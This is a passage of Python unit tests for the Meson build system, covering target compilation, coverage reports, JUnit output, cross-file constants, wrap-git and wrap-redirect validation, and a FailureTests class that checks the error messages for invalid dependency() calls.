    self.init(testdir, extra_args=['--wipe'])
    # Multiple targets and target type specified
    self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
    # Check that we have a shared lib, but not an executable, i.e. check that target actually worked
    self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
    self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
    self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
    self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
    # Target specified in a project with non unique names
    testdir = os.path.join(self.common_test_dir, '185 same target name')
    self.init(testdir, extra_args=['--wipe'])
    self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
    self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
    self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
    self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
    # run_target
    testdir = os.path.join(self.common_test_dir, '51 run target')
    self.init(testdir, extra_args=['--wipe'])
    out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
    self.assertIn('I am Python3.', out)
    # `--$BACKEND-args`
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    if self.backend is Backend.ninja:
        self.init(testdir, extra_args=['--wipe'])
        # Dry run - should not create a program
        self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
        self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
    elif self.backend is Backend.vs:
        self.init(testdir, extra_args=['--wipe'])
        self._run([*self.meson_command, 'compile', '-C', self.builddir])
        # Explicitly clean the target through msbuild interface
        self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
        self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
    """Regression test: a dep file generated in a build dir nested inside the
    source tree must not retrigger configuration on rebuild.

    See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
    """
    testdir = os.path.join(self.unit_test_dir, '74 dep files')
    # Reproduce the layout: build directory inside a copy of the source tree.
    srcdir = os.path.join(self.builddir, 'srctree')
    shutil.copytree(testdir, srcdir)
    self.change_builddir(os.path.join(srcdir, '_build'))
    self.init(srcdir)
    self.build()
    # The file did not exist at first configure, so no dependency was
    # recorded; a rebuild must not reconfigure.
    self.clean()
    self.assertNotIn('Project configured', self.build())
    self.init(srcdir, extra_args=['--reconfigure'])
    # Now the file exists but lives inside the build dir, so still no
    # dependency and still no reconfigure on rebuild.
    self.clean()
    self.assertNotIn('Project configured', self.build())
def _test_junit(self, case: str) -> None:
    """Run the tests of *case* and validate testlog.junit.xml against the schema."""
    try:
        import lxml.etree as et
    except ImportError:
        raise unittest.SkipTest('lxml required, but not found.')
    schema_path = Path(__file__).parent / 'data' / 'schema.xsd'
    schema = et.XMLSchema(et.parse(str(schema_path)))
    self.init(case)
    self.run_tests()
    logfile = Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'
    junit = et.parse(str(logfile))
    try:
        schema.assertValid(junit)
    except et.DocumentInvalid as e:
        self.fail(e.error_log)
def test_junit_valid_tap(self):
    """JUnit output of TAP-protocol tests validates against the schema."""
    case = os.path.join(self.common_test_dir, '206 tap tests')
    self._test_junit(case)
def test_junit_valid_exitcode(self):
    """JUnit output of exitcode-protocol tests validates against the schema."""
    case = os.path.join(self.common_test_dir, '41 test args')
    self._test_junit(case)
def test_junit_valid_gtest(self):
    """JUnit output of gtest-based tests validates against the schema."""
    case = os.path.join(self.framework_test_dir, '2 gtest')
    self._test_junit(case)
def test_link_language_linker(self):
    """Targets with link_language set must be linked via the C linker rule."""
    # TODO: there should be some way to query how we're linking things
    # without resorting to reading the ninja.build file
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest('This test reads the ninja file')
    self.init(os.path.join(self.common_test_dir, '225 link language'))
    with open(os.path.join(self.builddir, 'build.ninja'), encoding='utf-8') as f:
        contents = f.read()
    # Both build edges must use the c_LINKER rule.
    for pattern in (r'build main(\.exe)?.*: c_LINKER',
                    r'build (lib|cyg)?mylib.*: c_LINKER'):
        self.assertRegex(contents, pattern)
def test_commands_documented(self):
    '''
    Test that all listed meson commands are documented in Commands.md.
    '''
    # The docs directory is not in release tarballs.
    if not os.path.isdir('docs'):
        raise unittest.SkipTest('Doc directory does not exist.')
    doc_path = 'docs/markdown/Commands.md'
    md = None
    with open(doc_path, encoding='utf-8') as f:
        md = f.read()
    self.assertIsNotNone(md)
    ## Get command sections
    # Each '### <command>' heading opens a section that runs to the next
    # heading (or end of file); record (start, end) offsets per command.
    section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
    md_command_section_matches = [i for i in section_pattern.finditer(md)]
    md_command_sections = dict()
    for i, s in enumerate(md_command_section_matches):
        section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
        md_command_sections[s.group(1)] = (s.start(), section_end)
    ## Validate commands
    md_commands = {k for k,v in md_command_sections.items()}
    # Extract the command set from `meson --help`'s usage line and compare;
    # 'help' itself is not documented as a section.
    help_output = self._run(self.meson_command + ['--help'])
    help_commands = {c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(',')}
    self.assertEqual(md_commands | {'help'}, help_commands, f'Doc file: `{doc_path}`')
    ## Validate that each section has proper placeholders
    def get_data_pattern(command):
        # Each section must contain the usage and arguments include stubs
        # that get filled with generated CLI data.
        return re.compile(
            r'{{ ' + command + r'_usage.inc }}[\r\n]'
            r'.*?'
            r'{{ ' + command + r'_arguments.inc }}[\r\n]',
            flags = re.MULTILINE|re.DOTALL)
    for command in md_commands:
        m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
        self.assertIsNotNone(m, f'Command `{command}` is missing placeholders for dynamic data. Doc file: `{doc_path}`')
def _check_coverage_files(self, types=('text', 'xml', 'html')):
    """Assert that the coverage reports of the requested *types* exist
    under meson-logs/."""
    covdir = Path(self.builddir) / 'meson-logs'
    # Report type -> path relative to meson-logs (insertion order matters
    # only for deterministic failure messages).
    report_files = {
        'text': 'coverage.txt',
        'xml': 'coverage.xml',
        'html': 'coveragereport/index.html',
    }
    for report_type, relpath in report_files.items():
        if report_type in types:
            self.assertTrue((covdir / relpath).is_file(), msg=f'{relpath} is not a file')
def test_coverage(self):
    '''
    Check that the `coverage` target produces text, XML and HTML reports
    for a trivial project built with b_coverage enabled.
    '''
    if mesonbuild.environment.detect_msys2_arch():
        raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
    # Only the gcovr executable is needed; the rootdir capability flag
    # returned alongside it is unused here.
    gcovr_exe, _ = mesonbuild.environment.detect_gcovr()
    if not gcovr_exe:
        raise unittest.SkipTest('gcovr not found, or too old')
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_id() == 'clang':
        # clang coverage requires llvm-cov in addition to gcovr.
        if not mesonbuild.environment.detect_llvm_cov():
            raise unittest.SkipTest('llvm-cov not found')
    if cc.get_id() == 'msvc':
        raise unittest.SkipTest('Test only applies to non-MSVC compilers')
    self.init(testdir, extra_args=['-Db_coverage=true'])
    self.build()
    self.run_tests()
    self.run_target('coverage')
    self._check_coverage_files()
def test_coverage_complex(self):
    '''
    Same as test_coverage, but on a project with generated sources to
    exercise coverage collection on a less trivial build graph.
    '''
    if mesonbuild.environment.detect_msys2_arch():
        raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
    # Only the gcovr executable is needed; the rootdir capability flag
    # returned alongside it is unused here.
    gcovr_exe, _ = mesonbuild.environment.detect_gcovr()
    if not gcovr_exe:
        raise unittest.SkipTest('gcovr not found, or too old')
    testdir = os.path.join(self.common_test_dir, '105 generatorcustom')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_id() == 'clang':
        # clang coverage requires llvm-cov in addition to gcovr.
        if not mesonbuild.environment.detect_llvm_cov():
            raise unittest.SkipTest('llvm-cov not found')
    if cc.get_id() == 'msvc':
        raise unittest.SkipTest('Test only applies to non-MSVC compilers')
    self.init(testdir, extra_args=['-Db_coverage=true'])
    self.build()
    self.run_tests()
    self.run_target('coverage')
    self._check_coverage_files()
def test_coverage_html(self):
    '''
    Check that the `coverage-html` target produces only the HTML report.
    '''
    if mesonbuild.environment.detect_msys2_arch():
        raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
    # Only the gcovr executable is needed; the rootdir capability flag
    # returned alongside it is unused here.
    gcovr_exe, _ = mesonbuild.environment.detect_gcovr()
    if not gcovr_exe:
        raise unittest.SkipTest('gcovr not found, or too old')
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_id() == 'clang':
        # clang coverage requires llvm-cov in addition to gcovr.
        if not mesonbuild.environment.detect_llvm_cov():
            raise unittest.SkipTest('llvm-cov not found')
    if cc.get_id() == 'msvc':
        raise unittest.SkipTest('Test only applies to non-MSVC compilers')
    self.init(testdir, extra_args=['-Db_coverage=true'])
    self.build()
    self.run_tests()
    self.run_target('coverage-html')
    self._check_coverage_files(['html'])
def test_coverage_text(self):
    '''
    Check that the `coverage-text` target produces only the text report.
    '''
    if mesonbuild.environment.detect_msys2_arch():
        raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
    # Only the gcovr executable is needed; the rootdir capability flag
    # returned alongside it is unused here.
    gcovr_exe, _ = mesonbuild.environment.detect_gcovr()
    if not gcovr_exe:
        raise unittest.SkipTest('gcovr not found, or too old')
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_id() == 'clang':
        # clang coverage requires llvm-cov in addition to gcovr.
        if not mesonbuild.environment.detect_llvm_cov():
            raise unittest.SkipTest('llvm-cov not found')
    if cc.get_id() == 'msvc':
        raise unittest.SkipTest('Test only applies to non-MSVC compilers')
    self.init(testdir, extra_args=['-Db_coverage=true'])
    self.build()
    self.run_tests()
    self.run_target('coverage-text')
    self._check_coverage_files(['text'])
def test_coverage_xml(self):
    '''
    Check that the `coverage-xml` target produces only the XML report.
    '''
    if mesonbuild.environment.detect_msys2_arch():
        raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
    # Only the gcovr executable is needed; the rootdir capability flag
    # returned alongside it is unused here.
    gcovr_exe, _ = mesonbuild.environment.detect_gcovr()
    if not gcovr_exe:
        raise unittest.SkipTest('gcovr not found, or too old')
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_id() == 'clang':
        # clang coverage requires llvm-cov in addition to gcovr.
        if not mesonbuild.environment.detect_llvm_cov():
            raise unittest.SkipTest('llvm-cov not found')
    if cc.get_id() == 'msvc':
        raise unittest.SkipTest('Test only applies to non-MSVC compilers')
    self.init(testdir, extra_args=['-Db_coverage=true'])
    self.build()
    self.run_tests()
    self.run_target('coverage-xml')
    self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
    '''
    Test that [constants] sections in machine files are evaluated and
    that constants defined in an earlier file are visible in later ones.
    '''
    with temp_filename() as crossfile1, temp_filename() as crossfile2:
        # Write explicitly in UTF-8 so the test does not depend on the
        # platform's locale encoding.
        with open(crossfile1, 'w', encoding='utf-8') as f:
            f.write(textwrap.dedent(
                '''
                [constants]
                compiler = 'gcc'
                '''))
        with open(crossfile2, 'w', encoding='utf-8') as f:
            f.write(textwrap.dedent(
                '''
                [constants]
                toolchain = '/toolchain/'
                common_flags = ['--sysroot=' + toolchain / 'sysroot']

                [properties]
                c_args = common_flags + ['-DSOMETHING']
                cpp_args = c_args + ['-DSOMETHING_ELSE']

                [binaries]
                c = toolchain / compiler
                '''))

        values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
        # `compiler` comes from the first file, `toolchain` from the second;
        # the `/` operator joins paths.
        self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
        self.assertEqual(values['properties']['c_args'],
                         ['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
        self.assertEqual(values['properties']['cpp_args'],
                         ['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
    '''
    Test that a [wrap-git] subproject with a patch_directory can be
    fetched from a local git repository and built.
    '''
    with tempfile.TemporaryDirectory() as tmpdir:
        srcdir = os.path.join(tmpdir, 'src')
        shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
        upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
        # file:// URI so no network access is needed.
        upstream_uri = Path(upstream).as_uri()
        _git_init(upstream)
        # Write explicitly in UTF-8 so the test does not depend on the
        # platform's locale encoding.
        with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w', encoding='utf-8') as f:
            f.write(textwrap.dedent('''
              [wrap-git]
              url = {}
              patch_directory = wrap_git_builddef
              revision = master
            '''.format(upstream_uri)))
        self.init(srcdir)
        self.build()
        self.run_tests()
def test_multi_output_custom_target_no_warning(self):
    '''
    Test that using a multi-output custom target as a source does not
    emit the "Using the first one" warning during configure.
    '''
    testdir = os.path.join(self.common_test_dir, '228 custom_target source')

    out = self.init(testdir)
    self.assertNotRegex(out, 'WARNING:.*Using the first one.')
    self.build()
    self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
                     'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
    '''
    Test building against a custom C stdlib (c_stdlib property), both as
    a native and as a cross setting.
    '''
    testdir = os.path.join(self.unit_test_dir, '78 nostdlib')
    machinefile = os.path.join(self.builddir, 'machine.txt')
    # Write explicitly in UTF-8 so the test does not depend on the
    # platform's locale encoding.
    with open(machinefile, 'w', encoding='utf-8') as f:
        f.write(textwrap.dedent('''
            [properties]
            c_stdlib = 'mylibc'
            '''))

    # Test native C stdlib
    self.meson_native_file = machinefile
    self.init(testdir)
    self.build()

    # Test cross C stdlib
    self.new_builddir()
    self.meson_native_file = None
    self.meson_cross_file = machinefile
    self.init(testdir)
    self.build()
def test_meson_version_compare(self):
    '''
    Test that meson.version().version_compare() gates feature warnings
    correctly: configuring the project must not emit any WARNING.
    '''
    testdir = os.path.join(self.unit_test_dir, '82 meson version compare')
    out = self.init(testdir)
    self.assertNotRegex(out, r'WARNING')
def test_wrap_redirect(self):
    '''
    Test validation of [wrap-redirect] files: the target filename must be
    a .wrap file, must not escape via "..", and must have the form
    foo/subprojects/bar.wrap. A valid redirect is then followed.
    '''
    redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
    real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
    os.makedirs(os.path.dirname(real_wrap))

    # Invalid redirect, filename must have .wrap extension
    with open(redirect_wrap, 'w', encoding='utf-8') as f:
        f.write(textwrap.dedent('''
            [wrap-redirect]
            filename = foo/subprojects/real.wrapper
            '''))
    with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
        PackageDefinition(redirect_wrap)

    # Invalid redirect, filename cannot be in parent directory
    with open(redirect_wrap, 'w', encoding='utf-8') as f:
        f.write(textwrap.dedent('''
            [wrap-redirect]
            filename = ../real.wrap
            '''))
    with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
        PackageDefinition(redirect_wrap)

    # Invalid redirect, filename must be in foo/subprojects/real.wrap
    with open(redirect_wrap, 'w', encoding='utf-8') as f:
        f.write(textwrap.dedent('''
            [wrap-redirect]
            filename = foo/real.wrap
            '''))
    with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
        PackageDefinition(redirect_wrap)

    # Correct redirect
    with open(redirect_wrap, 'w', encoding='utf-8') as f:
        f.write(textwrap.dedent('''
            [wrap-redirect]
            filename = foo/subprojects/real.wrap
            '''))
    with open(real_wrap, 'w', encoding='utf-8') as f:
        f.write(textwrap.dedent('''
            [wrap-git]
            url = http://invalid
            '''))
    wrap = PackageDefinition(redirect_wrap)
    # The redirect must be transparent: values come from the real wrap.
    self.assertEqual(wrap.get('url'), 'http://invalid')
@skip_if_no_cmake
def test_nested_cmake_rebuild(self) -> None:
    # This checks a bug where if a non-meson project is used as a third
    # level (or deeper) subproject it doesn't cause a rebuild if the build
    # files for that project are changed
    testdir = os.path.join(self.unit_test_dir, '85 nested subproject regenerate depends')
    cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt'
    self.init(testdir)
    self.build()
    # Touch the CMakeLists.txt: open in append mode (no content change)
    # and bump its timestamps, then verify reconfiguration is a no-op.
    with cmakefile.open('a') as f:
        os.utime(str(cmakefile))
    self.assertReconfiguredBuildIsNoop()
def test_version_file(self):
    '''
    Test that a project version read from a file is reported correctly
    by `meson introspect --projectinfo`.
    '''
    srcdir = os.path.join(self.common_test_dir, '2 cpp')
    self.init(srcdir)
    projinfo = self.introspect('--projectinfo')
    self.assertEqual(projinfo['version'], '1.0.0')
def test_cflags_cppflags(self):
    '''
    Test that CPPFLAGS, CFLAGS and CXXFLAGS environment variables are all
    picked up when configuring and the project still builds.
    '''
    envs = {'CPPFLAGS': '-DCPPFLAG',
            'CFLAGS': '-DCFLAG',
            'CXXFLAGS': '-DCXXFLAG'}
    srcdir = os.path.join(self.unit_test_dir, '89 multiple envvars')
    self.init(srcdir, override_envvars=envs)
    self.build()
def test_build_b_options(self) -> None:
    # Currently (0.57) these do nothing, but they've always been allowed
    srcdir = os.path.join(self.common_test_dir, '2 cpp')
    self.init(srcdir, extra_args=['-Dbuild.b_lto=true'])
def test_install_skip_subprojects(self):
    '''
    Test `meson install --skip-subprojects`: with no argument all
    subprojects are skipped, with a name only that subproject is skipped,
    and an unknown name skips nothing.
    '''
    testdir = os.path.join(self.unit_test_dir, '92 install skip subprojects')
    self.init(testdir)
    self.build()

    # Files installed by the main project.
    main_expected = [
        '',
        'share',
        'include',
        'foo',
        'bin',
        'share/foo',
        'share/foo/foo.dat',
        'include/foo.h',
        'foo/foofile',
        'bin/foo' + exe_suffix,
    ]
    # Files installed by the `bar` subproject.
    bar_expected = [
        'bar',
        'share/foo/bar.dat',
        'include/bar.h',
        'bin/bar' + exe_suffix,
        'bar/barfile'
    ]
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_argument_syntax() == 'msvc':
        # MSVC-style compilers also install .pdb debug files.
        main_expected.append('bin/foo.pdb')
        bar_expected.append('bin/bar.pdb')
    prefix = destdir_join(self.installdir, self.prefix)
    main_expected = [Path(prefix, p) for p in main_expected]
    bar_expected = [Path(prefix, p) for p in bar_expected]
    all_expected = main_expected + bar_expected

    def check_installed_files(extra_args, expected):
        # Install into a fresh destdir and compare the full file listing.
        args = ['install', '--destdir', self.installdir] + extra_args
        self._run(self.meson_command + args, workdir=self.builddir)
        all_files = list(Path(self.installdir).rglob('*'))
        self.assertEqual(sorted(expected), sorted(all_files))
        windows_proof_rmtree(self.installdir)

    check_installed_files([], all_expected)
    check_installed_files(['--skip-subprojects'], main_expected)
    check_installed_files(['--skip-subprojects', 'bar'], main_expected)
    # Unknown subproject name: nothing is skipped.
    check_installed_files(['--skip-subprojects', 'another'], all_expected)
def test_adding_subproject_to_configure_project(self) -> None:
    '''
    Test that enabling a subproject via `meson configure` on an already
    configured build tree works (regression for new-subproject handling).
    '''
    srcdir = os.path.join(self.unit_test_dir, '93 new subproject in configured project')
    self.init(srcdir)
    self.build()
    self.setconf('-Duse-sub=true')
    self.build()
def test_devenv(self):
    '''
    Test `meson devenv`: environment variables declared by the project
    are visible to a script, and built executables are runnable.
    '''
    testdir = os.path.join(self.unit_test_dir, '91 devenv')
    self.init(testdir)
    self.build()
    cmd = self.meson_command + ['devenv', '-C', self.builddir]
    script = os.path.join(testdir, 'test-devenv.py')
    app = os.path.join(self.builddir, 'app')
    self._run(cmd + python_command + [script])
    self.assertEqual('This is text.', self._run(cmd + [app]).strip())
def test_clang_format_check(self):
    '''
    Test the clang-format and clang-format-check targets: `clang-format`
    rewrites files in place, while `clang-format-check` fails without
    touching anything.
    '''
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest(f'Skipping clang-format tests with {self.backend.name} backend')
    if not shutil.which('clang-format'):
        raise unittest.SkipTest('clang-format not found')

    # Work on a copy of the test dir because clang-format modifies sources.
    testdir = os.path.join(self.unit_test_dir, '94 clangformat')
    newdir = os.path.join(self.builddir, 'testdir')
    shutil.copytree(testdir, newdir)
    self.new_builddir()
    self.init(newdir)

    # Should reformat 1 file but not return error
    output = self.build('clang-format')
    self.assertEqual(1, output.count('File reformatted:'))

    # Reset source tree then try again with clang-format-check, it should
    # return an error code this time.
    windows_proof_rmtree(newdir)
    shutil.copytree(testdir, newdir)
    with self.assertRaises(subprocess.CalledProcessError):
        output = self.build('clang-format-check')
        self.assertEqual(1, output.count('File reformatted:'))

    # The check format should not touch any files. Thus
    # running format again has some work to do.
    output = self.build('clang-format')
    self.assertEqual(1, output.count('File reformatted:'))
    # After reformatting, the check target must now succeed.
    self.build('clang-format-check')
def test_custom_target_implicit_include(self):
    '''
    Test that the implicit include directory of a custom target is added
    to the compile command of prog2.c but not to that of prog.c.
    '''
    testdir = os.path.join(self.unit_test_dir, '95 custominc')
    self.init(testdir)
    self.build()
    compdb = self.get_compdb()

    # prog.c must NOT pick up the custom target's include dir.
    prog_entries = [entry for entry in compdb if 'prog.c' in entry['file']]
    for entry in prog_entries:
        self.assertNotIn('easytogrepfor', entry['command'])
    self.assertEqual(len(prog_entries), 1)

    # prog2.c MUST pick up the custom target's include dir.
    prog2_entries = [entry for entry in compdb if 'prog2.c' in entry['file']]
    for entry in prog2_entries:
        self.assertIn('easytogrepfor', entry['command'])
    self.assertEqual(len(prog2_entries), 1)
def test_env_flags_to_linker(self) -> None:
    # Compilers that act as drivers should add their compiler flags to the
    # linker, those that do not shouldn't
    with mock.patch.dict(os.environ, {'CFLAGS': '-DCFLAG', 'LDFLAGS': '-flto'}):
        env = get_fake_env()

        # Get the compiler so we know which compiler class to mock.
        cc = env.detect_compiler_for('c', MachineChoice.HOST)
        cc_type = type(cc)

        # Test a compiler that acts as a linker
        with mock.patch.object(cc_type, 'INVOKES_LINKER', True):
            # Re-detect so the patched class attribute takes effect.
            cc = env.detect_compiler_for('c', MachineChoice.HOST)
            link_args = env.coredata.get_external_link_args(cc.for_machine, cc.language)
            # CFLAGS are forwarded to the link line as well.
            self.assertEqual(sorted(link_args), sorted(['-DCFLAG', '-flto']))

        # And one that doesn't
        with mock.patch.object(cc_type, 'INVOKES_LINKER', False):
            cc = env.detect_compiler_for('c', MachineChoice.HOST)
            link_args = env.coredata.get_external_link_args(cc.for_machine, cc.language)
            # Only LDFLAGS reach the linker in this case.
            self.assertEqual(sorted(link_args), sorted(['-flto']))
class FailureTests(BasePlatformTests):
    '''
    Tests that test failure conditions. Build files here should be dynamically
    generated and static tests should go into `test cases/failing*`.
    This is useful because there can be many ways in which a particular
    function can fail, and creating failing tests for all of them is tedious
    and slows down testing.
    '''
    # Regex matching the generic "dependency not found" error message.
    dnf = "[Dd]ependency.*not found(:.*)?"
    # Regex matching the "pkg-config not found" error message.
    nopkg = '[Pp]kg-config.*not found'

    def setUp(self):
        # Each test writes its own meson.build/meson_options.txt into a
        # fresh temporary source directory.
        super().setUp()
        self.srcdir = os.path.realpath(tempfile.mkdtemp())
        self.mbuild = os.path.join(self.srcdir, 'meson.build')
        self.moptions = os.path.join(self.srcdir, 'meson_options.txt')

    def tearDown(self):
        super().tearDown()
        windows_proof_rmtree(self.srcdir)

    def assertMesonRaises(self, contents, match, *,
                          extra_args=None,
                          langs=None,
                          meson_version=None,
                          options=None,
                          override_envvars=None):
        '''
        Assert that running meson configure on the specified @contents raises
        a error message matching regex @match.
        '''
        if langs is None:
            langs = []
        with open(self.mbuild, 'w') as f:
            f.write("project('failure test', 'c', 'cpp'")
            if meson_version:
                f.write(f", meson_version: '{meson_version}'")
            f.write(")\n")
            for lang in langs:
                f.write(f"add_languages('{lang}', required : false)\n")
            f.write(contents)
        if options is not None:
            with open(self.moptions, 'w') as f:
                f.write(options)
        o = {'MESON_FORCE_BACKTRACE': '1'}
        if override_envvars is None:
            override_envvars = o
        else:
            override_envvars.update(o)
        # Force tracebacks so we can detect them properly
        with self.assertRaisesRegex(MesonException, match, msg=contents):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(self.srcdir, extra_args=extra_args,
                      inprocess=True,
                      override_envvars = override_envvars)

    def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
        # Write a meson.build with @contents and return the configure output.
        # NOTE: @match is accepted for signature symmetry with the assert
        # helpers but is not used here; callers do the matching themselves.
        if langs is None:
            langs = []
        with open(self.mbuild, 'w') as f:
            f.write("project('output test', 'c', 'cpp'")
            if meson_version:
                f.write(f", meson_version: '{meson_version}'")
            f.write(")\n")
            for lang in langs:
                f.write(f"add_languages('{lang}', required : false)\n")
            f.write(contents)
        # Run in-process for speed and consistency with assertMesonRaises
        return self.init(self.srcdir, extra_args=extra_args, inprocess=True)

    def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents outputs
        something that matches regex @match.
        '''
        out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
        self.assertRegex(out, match)

    def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
        '''
        Assert that running meson configure on the specified @contents does not output
        something that matches regex @match.
        '''
        out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
        self.assertNotRegex(out, match)

    @skipIfNoPkgconfig
    def test_dependency(self):
        # Invalid keyword arguments to dependency() must produce the
        # corresponding error messages.
        if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
            raise unittest.SkipTest('zlib not found with pkg-config')
        a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
             ("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
             ("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
             ("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
             ("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
             ("dependency('zlibfail')", self.dnf),)
        for contents, match in a:
            self.assertMesonRaises(contents, match)

    def test_apple_frameworks_dependency(self):
        if not is_osx():
            raise unittest.SkipTest('only run on macOS')
        self.assertMesonRaises("dependency('appleframeworks')",
                               "requires at least one module")

    def test_extraframework_dependency_method(self):
        code = "dependency('python', method : 'extraframework')"
        if not is_osx():
            self.assertMesonRaises(code, self.dnf)
        else:
            # Python2 framework is always available on macOS
            self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')

    def test_sdl2_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('sdl2-config'):
            raise unittest.SkipTest('sdl2-config found')
        self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
        if shutil.which('pkg-config'):
            self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
        with no_pkgconfig():
            # Look for pkg-config, cache it, then
            # Use cached pkg-config without erroring out, then
            # Use cached pkg-config to error out
            code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
                "dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
                "dependency('sdl2', method : 'pkg-config')"
            self.assertMesonRaises(code, self.nopkg)

    def test_gnustep_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('gnustep-config'):
            raise unittest.SkipTest('gnustep-config found')
        self.assertMesonRaises("dependency('gnustep')",
                               f"(requires a Objc compiler|{self.dnf})",
                               langs = ['objc'])

    def test_wx_notfound_dependency(self):
        # Want to test failure, so skip if available
        if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
            raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
        self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
        self.assertMesonOutputs("dependency('wxwidgets', required : false)",
                                "Run-time dependency .*WxWidgets.* found: .*NO.*")

    def test_wx_dependency(self):
        if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
            raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
        self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
                               "module argument is not a string")

    def test_llvm_dependency(self):
        self.assertMesonRaises("dependency('llvm', modules : 'fail')",
                               f"(required.*fail|{self.dnf})")

    def test_boost_notfound_dependency(self):
        # Can be run even if Boost is found or not
        self.assertMesonRaises("dependency('boost', modules : 1)",
                               "module.*not a string")
        self.assertMesonRaises("dependency('boost', modules : 'fail')",
                               f"(fail.*not found|{self.dnf})")

    def test_boost_BOOST_ROOT_dependency(self):
        # Test BOOST_ROOT; can be run even if Boost is found or not
        self.assertMesonRaises("dependency('boost')",
                               f"(boost_root.*absolute|{self.dnf})",
                               override_envvars = {'BOOST_ROOT': 'relative/path'})

